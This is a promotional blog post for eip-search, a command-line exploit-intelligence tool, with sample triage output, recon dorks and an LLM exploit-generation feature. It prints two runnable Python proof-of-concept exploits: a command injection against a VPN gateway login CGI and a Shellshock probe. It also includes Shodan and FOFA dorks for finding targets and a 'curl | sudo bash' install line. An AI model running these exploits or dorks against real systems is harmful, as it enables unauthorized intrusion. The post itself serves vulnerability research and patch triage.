If you’ve spent any time in offensive security, you know searchsploit. It’s been the go-to for years. Local database, fast lookups, simple interface. We’ve used it hundreds of times.
But here’s what it can’t tell you: is this exploit actually being used in the wild? What’s the probability it’ll be exploited in the next 30 days? Is there a Metasploit module, or just a sketch PoC? Is that GitHub repo you’re about to clone actually a trojan?
Those questions matter. That’s why we built eip-search.
What It Is
eip-search is a command-line tool that searches the full Exploit Intelligence Platform - hundreds of thousands of vulnerabilities and exploits - directly from your terminal. Not a local database mirror. Live data: NVD, ExploitDB, Metasploit, GitHub PoCs, CISA KEV, VulnCheck KEV, InTheWild.io, EPSS exploitation probabilities, ransomware attribution, and AI analysis of every exploit. The kind of context that used to require six browser tabs and a strong coffee.
It runs on macOS, Linux (including Kali - with a native APT repo), and Windows:
# pip (any platform)
pip install eip-search
# Kali/Debian - native APT repo
curl -fsSL https://repo.exploit-intel.com/setup.sh | sudo bash
sudo apt install eip-search
# pipx (isolated install)
pipx install eip-search
No API key required. No signup. Full install instructions for every platform are on the CLI page.
Real Examples
Everything below is real output from the live platform.
Triage: What Should You Worry About Right Now?
The triage command is where most workflows start. Say you’re assessing a network with Fortinet gear. You don’t just want a list of CVEs - you want to know which ones are actually dangerous right now:
$ eip-search triage --vendor fortinet -n 5
TRIAGE - vulnerabilities with exploits, sorted by exploitation risk
Filters: vendor=fortinet, EPSS>=0.5
┏━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━━┳━━━━━━┳━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃CVE ┃ Sev ┃ CVSS ┃ EPSS ┃ Exp ┃ ┃ Title ┃
┡━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━━╇━━━━━━╇━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│CVE-2018-13379 │ CRITICAL │ 9.1 │ 94.5% │ 14 │ KEV │ Fortinet FortiProxy… │
│CVE-2022-40684 │ CRITICAL │ 9.8 │ 94.4% │ 31 │ KEV │ Fortinet FortiProxy… │
│CVE-2024-55591 │ CRITICAL │ 9.8 │ 94.2% │ 9 │ KEV │ Fortinet FortiProxy… │
│CVE-2023-48788 │ CRITICAL │ 9.8 │ 94.2% │ 2 │ KEV │ Fortinet FortiClient… │
│CVE-2022-42475 │ CRITICAL │ 9.8 │ 94.0% │ 7 │ KEV │ Fortinet FortiOS… │
└─────────────────┴────────────┴───────┴────────┴──────┴─────┴───────────────────────┘
Every row gives you the full picture at a glance. CVSS severity. EPSS probability - that 94.5% means someone is almost certainly running this against production systems right now. Exploit count. KEV badge for confirmed active exploitation. Five CVEs, five things that will ruin your Friday if you haven’t patched. This is triage, not a CVE dump.
Full Intelligence Brief
Pick one. Let’s say you want the full picture on CVE-2024-3400 - the Palo Alto PAN-OS unauthenticated RCE that shook everyone last year:
$ eip-search CVE-2024-3400
╭──────────────────────────────────────╮
│ CVE-2024-3400 CRITICAL KEV NUCLEI │
╰──────────────────────────────────────╯
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
CVSS: 10.0 EPSS: 94.3% (99.9th percentile)
Attack Vector: NETWORK | CWE: CWE-20, CWE-77 | Published: 2024-04-12
Exploits (43)
MODULES
#66486 metasploit ruby panos_telemetry_cmd_exec.rb
Rank: excellent LLM: working_poc has code
PROOF OF CONCEPT
#61519 ★ 161 nomisec h4x0r-dz/CVE-2024-3400
LLM: working_poc has code
#61520 ★ 90 nomisec W01fh4cker/CVE-2024-3400-RCE-Scan
LLM: working_poc has code
...and 30 more PoCs
SUSPICIOUS
#61514 ★ 13 nomisec momika233/CVE-2024-3400
⚠ TROJAN - flagged by AI analysis
43 exploits. One Metasploit module (peer-reviewed, excellent rank). GitHub PoCs ranked by stars. And at the bottom - a trojan, flagged by AI analysis. That momika233 repo has 13 GitHub stars and would show up in any reasonable search. We wrote about that one in our trojan detection post
- it drops a persistent backdoor disguised as a PAN-OS PoC. Thirteen people starred it. Some of them probably cloned it.
This is the context that matters. Not just “an exploit exists” but which ones are trustworthy and which ones will backdoor your assessment laptop.
Reading and Downloading Exploit Code
Found an exploit you want to inspect? Read it in the terminal before you commit to cloning anything:
$ eip-search view 66486
This opens the Metasploit module for CVE-2024-3400 directly in your terminal. No browser, no clone, no risk of running something you haven’t read. You can also pass a CVE ID and pick interactively from the available exploits.
Want to download it instead?
$ eip-search download CVE-2024-3400 --extract
Exploit code is delivered as a password-protected ZIP (password: eip) because your AV will absolutely lose its mind otherwise. The --extract flag unpacks it immediately.
Scanning and Recon
Middle of a pentest, need to find exposed instances before someone else does? The nuclei command pulls scanner templates and recon dorks:
$ eip-search nuclei CVE-2024-27198
╭──────────────────────────────────╮
│ CVE-2024-27198 Nuclei Templates │
╰──────────────────────────────────╯
TeamCity < 2023.11.4 - Authentication Bypass
CVE-2024-27198 ✓ verified critical
Author: DhiyaneshDk
Tags: cve2024, teamcity, jetbrains, auth-bypass, kev
Recon Queries:
Shodan: http.component:"TeamCity"
FOFA: title=teamcity
Google: intitle:teamcity
Run: nuclei -t CVE-2024-27198 -u https://target.com
Copy-paste Shodan dorks, FOFA queries, and a ready-to-run Nuclei command. No tab-switching, no manual lookup.
Browsing Exploits
Want to see what RCE Metasploit modules exist? Filter by source, attack type, language, complexity, reliability, author - whatever narrows it down:
$ eip-search exploits --source metasploit --attack-type RCE -n 5
┏━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━┓
┃ID ┃ CVE ┃ Sev ┃ Source ┃ Lang ┃
┡━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━┩
│116401 │ CVE-2024-12356 │ CRITICAL │ metasploit │ ruby │
│116129 │ CVE-2025-7441 │ CRITICAL │ metasploit │ ruby │
│69819 │ CVE-2023-2917 │ CRITICAL │ metasploit │ ruby │
│69916 │ CVE-2023-20198 │ CRITICAL │ metasploit │ ruby │
│69997 │ CVE-2014-6041 │ -- │ metasploit │ ruby │
└─────────┴──────────────────┴────────────┴─────────────┴──────────┘
Page 1/429 (2,143 total results)
2,143 Metasploit RCE modules across all vendors. That’s not a typo. Filter by --language python if you want scripts you can actually modify, --reliability reliable if you only want the ones that work consistently, or --vendor fortinet if you’re having that kind of week.
Researcher Profiles
Ever wonder who’s actually writing all these exploits? Browse by author:
$ eip-search authors
$ eip-search author "Chocapikk"
This shows an author’s full exploit portfolio - every PoC they’ve published, the CVEs they target, and star counts. Useful for following prolific researchers or vetting who’s behind a PoC.
Vendor and Product Discovery
Need exact product names for filtering? CPE naming conventions are nobody’s idea of a good time (exchange_server, not Exchange), so the vendors and products commands let you discover the right values:
$ eip-search vendors # top vendors by vuln count
$ eip-search products microsoft # Microsoft products (CPE names)
Resolving IDs
Got an ExploitDB number or a GitHub Security Advisory and need the CVE? One command:
$ eip-search lookup EDB-51996
Goes straight from EDB-51996 to CVE-2024-3400 with severity info.
JSON for Everything
Every command supports --json for piping into jq, feeding SIEMs, or building automation:
$ eip-search search "log4j" --has-exploits --json | jq '.items[].cve_id'
"CVE-2021-44228"
"CVE-2021-45046"
"CVE-2021-45105"
...
For a recent high-risk feed, this query returns critical CVEs with public exploits, EPSS >= 0.5, sorted by exploitation probability, limited to a publication window:
$ eip-search search --severity critical --has-exploits --min-epss 0.5 --sort epss_desc --date-from 2024-01-01 --date-to 2025-12-31 --json
Build monitoring scripts, feed dashboards, or chain it with other tools. The structured output makes eip-search a building block, not just a lookup tool.
The Full Command Set
For reference - everything eip-search can do:
| Command | What it does |
|---|---|
search | Search vulnerabilities with filters (severity, KEV, exploits, vendor, CWE, EPSS threshold, date range) |
info | Full intelligence brief for a CVE - exploits ranked by quality, trojan warnings, references |
triage | Risk-based triage sorted by EPSS exploitation probability |
exploits | Browse exploits by source, language, attack type, complexity, reliability, author |
view | Syntax-highlighted exploit source code in your terminal |
download | Download exploit as password-protected ZIP (AV-safe) |
nuclei | Nuclei templates + Shodan/FOFA/Google recon dorks |
generate | Generate a PoC exploit using a local LLM (Ollama) |
stats | Platform-wide statistics |
authors | Top exploit authors ranked by count |
author | Author profile with their exploits |
vendors | Top vendors by vulnerability count |
products | Products for a vendor (discover CPE names for filtering) |
cwes | CWE categories ranked by vulnerability count |
lookup | Resolve ExploitDB or GHSA identifiers to CVE |
analysis | Full AI analysis of an exploit - classification, attack type, complexity, reliability, MITRE ATT&CK, trojan indicators |
update-db | Download the offline database for local searching without an internet connection |
Auto-routing means you don’t always need the subcommand: eip-search CVE-2024-3400 goes straight to info, and eip-search "apache httpd" goes straight to search.
Offline Mode
Airgapped labs. Red team engagements where you can’t phone home. That one flight where you swore you’d prep your toolkit but spent three hours watching movies instead. The update-db command downloads a full copy of the EIP database (~200 MB compressed, ~1 GB on disk) as a local SQLite file:
$ eip-search update-db
Downloading ━━━━━━━━━━━━━━━━━━━━━━━ 219.4/219.4 MB 52.6 MB/s
Decompressing...
Database ready: ~/.eip/eip.db (966 MB)
Then use the --offline flag with any command:
$ eip-search --offline search "apache httpd" --has-exploits
$ eip-search --offline CVE-2024-3400
$ eip-search --offline triage --vendor fortinet
The offline database includes everything - full vulnerability and exploit coverage, AI analysis, EPSS scores, KEV data. Rebuilt from production multiple times daily. No API calls, no latency, full functionality. It’s searchsploit with ten years of accumulated intelligence baked in.
Offline Exploit Code
Want view and download to work offline too? Sync the exploit archive via rsync:
$ rsync -avz rsync://rsync.exploit-intel.com/exploits/ ~/eip-exploits/
Then add the path to your config (~/.eip-search.toml):
[offline]
exploits_dir = "~/eip-exploits"
Now you can view and download exploit source code without an internet connection:
$ eip-search --offline view CVE-2024-3400
$ eip-search --offline download 77423 -x
The archive contains tens of thousands of repositories (tens of GB) and is synced from production multiple times daily alongside the database.
Experimental: LLM-Powered PoC Generation
This one’s experimental, but we’ve been having fun with it. The generate command uses a local LLM (via Ollama
) to create proof-of-concept exploit code from vulnerability intelligence.
The idea: you have a CVE with a detailed writeup - maybe a blog post describing the HTTP request that triggers a command injection, complete with screenshots of Burp Suite captures - but no actual exploit script exists. The LLM reads the writeup, analyzes any screenshots through a vision model, and generates a working Python PoC.
Before committing GPU cycles, you can check feasibility:
$ eip-search generate CVE-2026-2686 --check
CVE-2026-2686 - SECCN Dingcheng G10 3.1.0.181203 - Command Injection
CVSS 9.8 | RCE | trivial | Feasibility: EXCELLENT (11)
Reasons: web-based (RCE), trivial, has writeup, HTTP details in summary,
known CWE pattern
Files: 1 text, 8 screenshots
The feasibility scorer evaluates the CVE on an 11-point scale - web-based attack vector, complexity, whether a writeup exists, whether the description contains HTTP details, known CWE patterns. Anything scoring “excellent” or “good” is worth a shot. “Difficult” means the LLM probably doesn’t have enough to work with, and the tool won’t even try.
When you run the full pipeline, it fetches the writeup text, sends up to 8 screenshots through a vision model to extract technical details (endpoints, parameters, payloads), then hands everything to a code model to generate a standalone Python 3 exploit:
$ eip-search generate CVE-2026-2686
CVE-2026-2686 - SECCN Dingcheng G10 3.1.0.181203 - Command Injection
CVSS 9.8 | RCE | trivial | Feasibility: EXCELLENT (11)
Writeup: 3770 chars from exploit 116130
Prompt: 6789 chars
Generated 102 lines in 17.5s
The writeup for this CVE describes a command injection in the login endpoint of a VPN gateway - complete with the exact POST request, headers, and payload. The LLM reads that and produces a functional exploit:
Generated PoC - CVE-2026-2686 (click to expand)
#!/usr/bin/env python3
"""
CVE-2026-2686 - SECCN Dingcheng G10 3.1.0.181203 - Command Injection
CVSS: 9.8 (NETWORK)
CWE: CWE-77, CWE-78
Source: https://exploit-intel.com/vulns/CVE-2026-2686
Generated: 2026-02-22 14:20 UTC
NOTE: This exploit was AUTO-GENERATED by an LLM and has NOT been tested.
It may be incomplete, incorrect, or non-functional. Always review and
validate before use in any security assessment.
DISCLAIMER: This script is provided for authorized security testing and
educational purposes only. Unauthorized access to computer systems is illegal.
Use responsibly and only against systems you have permission to test.
Powered by Exploit Intelligence Platform - https://exploit-intel.com
"""
import argparse
import sys
import requests
from urllib.parse import urljoin
def parse_args() -> argparse.Namespace:
p = argparse.ArgumentParser(
description="PoC for CVE-2026-2686 – SECCN Dingcheng G10 session_login.cgi RCE"
)
p.add_argument("target", help="Target IP/hostname (e.g. 192.168.0.254)")
p.add_argument(
"-P", "--port", type=int, default=81, help="Target port (default: 81)"
)
p.add_argument(
"-t", "--timeout", type=int, default=8, help="HTTP timeout in seconds (default: 8)"
)
return p.parse_args()
def exploit(target: str, port: int, timeout: int) -> bool:
url = urljoin(f"http://{target}:{port}", "/cgi-bin/session_login.cgi")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/91.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": f"http://{target}:{port}",
"Referer": f"http://{target}:{port}/cgi-bin/session_login.cgi",
"Upgrade-Insecure-Requests": "1",
}
payload = "13800138000;id;echo 'CVE2026-2686-POC'"
data = {
"user": payload,
"sms_send": "获取验证码",
"pass": "",
}
print(f"[*] Target: {url}")
print(f"[*] Injecting benign command: 'id'")
try:
resp = requests.post(url, headers=headers, data=data, timeout=timeout)
except requests.RequestException as e:
print(f"[-] HTTP error: {e}")
return False
if resp.status_code != 200:
print(f"[-] Unexpected HTTP status: {resp.status_code}")
return False
if b"uid=" in resp.content:
print("[+] Command injection confirmed – 'id' output detected in response")
for line in resp.text.splitlines():
if "uid=" in line:
print(f" --> {line.strip()}")
break
return True
else:
print("[-] No 'id' output found – vulnerability may not be present or already patched")
return False
def main() -> None:
print("=" * 70)
print("CVE-2026-2686 PoC – SECCN Dingcheng G10 Command Injection")
print("ONLY USE ON SYSTEMS YOU OWN OR HAVE PERMISSION TO TEST")
print("=" * 70)
args = parse_args()
success = exploit(args.target, args.port, args.timeout)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
It got the endpoint (/cgi-bin/session_login.cgi), the injection point (user parameter), the POST body fields, even the Chinese URL-decoded form values - all extracted from the writeup. No human wrote this. The LLM read the vulnerability description and produced a runnable script.
It also handles a problem every pentester has cursed at: broken Python 2 exploits on ExploitDB. Thousands of scripts with print statements, urllib2, raw_input(), and .decode('hex') - code that throws SyntaxError the moment you run it. It’s 2026 and we’re still dealing with Python 2 print statements. The generate command detects existing exploit code and rewrites it:
$ eip-search generate CVE-2014-6271
CVE-2014-6271 - Apache mod_cgi Bash Environment Variable Code Injection
(Shellshock)
CVSS 9.8 | RCE | moderate | Feasibility: GOOD (6)
Writeup: 288 chars from exploit 47517
Existing code: 6442 chars from exploit 47554
Prompt: 9754 chars
Generated 74 lines in 13.8s
It found an existing Python 2 exploit (6,442 chars of urllib2, old-style except clauses, bare print statements) and rewrote it into clean Python 3:
Rewritten exploit - CVE-2014-6271 Shellshock (click to expand)
#!/usr/bin/env python3
"""
CVE-2014-6271 - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
CVSS: 9.8 (NETWORK)
CWE: CWE-78
Source: https://exploit-intel.com/vulns/CVE-2014-6271
Generated: 2026-02-22 14:21 UTC
NOTE: This exploit was AUTO-GENERATED by an LLM and has NOT been tested.
It may be incomplete, incorrect, or non-functional. Always review and
validate before use in any security assessment.
DISCLAIMER: This script is provided for authorized security testing and
educational purposes only. Unauthorized access to computer systems is illegal.
Use responsibly and only against systems you have permission to test.
Powered by Exploit Intelligence Platform - https://exploit-intel.com
"""
import argparse
import sys
import requests
from urllib.parse import urlparse
TIMEOUT = 8
PAYLOAD = "() { :;}; echo; /bin/bash -c 'id'"
def banner():
print("-" * 70)
print("CVE-2014-6271 (Shellshock) – lightweight PoC")
print("-" * 70)
def probe(url):
"""Return True if the target appears vulnerable."""
headers = {"User-Agent": PAYLOAD}
try:
resp = requests.get(url, headers=headers, timeout=TIMEOUT, verify=False)
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
return False
if "uid=" in resp.text and ("gid=" in resp.text or "groups=" in resp.text):
print("[+] Target appears VULNERABLE – 'id' output detected:")
for line in resp.text.splitlines():
if "uid=" in line:
print(" " + line.strip())
return True
else:
print("[-] Target does NOT appear vulnerable – no 'id' output found.")
return False
def main():
banner()
parser = argparse.ArgumentParser(
description="Check a CGI endpoint for Shellshock (CVE-2014-6271)")
parser.add_argument("url", help="Full URL to a CGI script (e.g. http://10.0.0.1/cgi-bin/test.sh)")
args = parser.parse_args()
if not args.url.lower().startswith("http"):
print("[-] Supply a full URL including scheme (http/https).")
sys.exit(1)
print(f"[*] Testing: {args.url}")
if probe(args.url):
print("[*] Remediation: upgrade Bash to 4.3-027 or later.")
else:
print("[*] No immediate evidence of vulnerability.")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Aborted by user")
sys.exit(1)
The original would crash on import. The rewrite uses requests, modern exception handling, and argparse - runs cleanly under Python 3. No more sed 's/print /print(/g' and hoping for the best.
To be clear: this is experimental. It works well for simple, web-based vulnerabilities - command injection via a POST parameter, SQL injection in a query string, authentication bypasses with known HTTP requests. The sweet spot is a CVE with a detailed writeup (bonus points for screenshots showing the actual HTTP traffic) where nobody has published a script yet. It’s not going to generate a working kernel exploit or a complex deserialization chain.
But for the cases where it works? It saves real time. You go from “here’s a writeup describing the vuln” to “here’s a runnable Python script that proves it” in under a minute.
Standing on the Shoulders of searchsploit
searchsploit paved the way. It taught a generation of security professionals to look for exploit code from the command line, and it’s still a great tool for fast local lookups against ExploitDB. We use it. We recommend it.
eip-search picks up where it leaves off. EPSS exploitation probabilities, CISA KEV confirmations, AI-analyzed exploit quality, trojan detection across GitHub repos - none of this existed when searchsploit was designed, and none of it fits in a local database mirror.
Same spirit, broader scope. The question isn’t just “does an exploit exist?” anymore - it’s is it good, is it real, is it going to steal my credentials, and should I care?
Install
pip install eip-search
Or use the Kali APT repo, pipx, or build from source - whatever fits your setup. Then try:
eip-search stats # see the platform
eip-search "apache httpd" # search anything
eip-search CVE-2024-3400 # full intelligence brief
eip-search triage # what to patch first
Full source is on GitHub . Issues, ideas, and contributions welcome.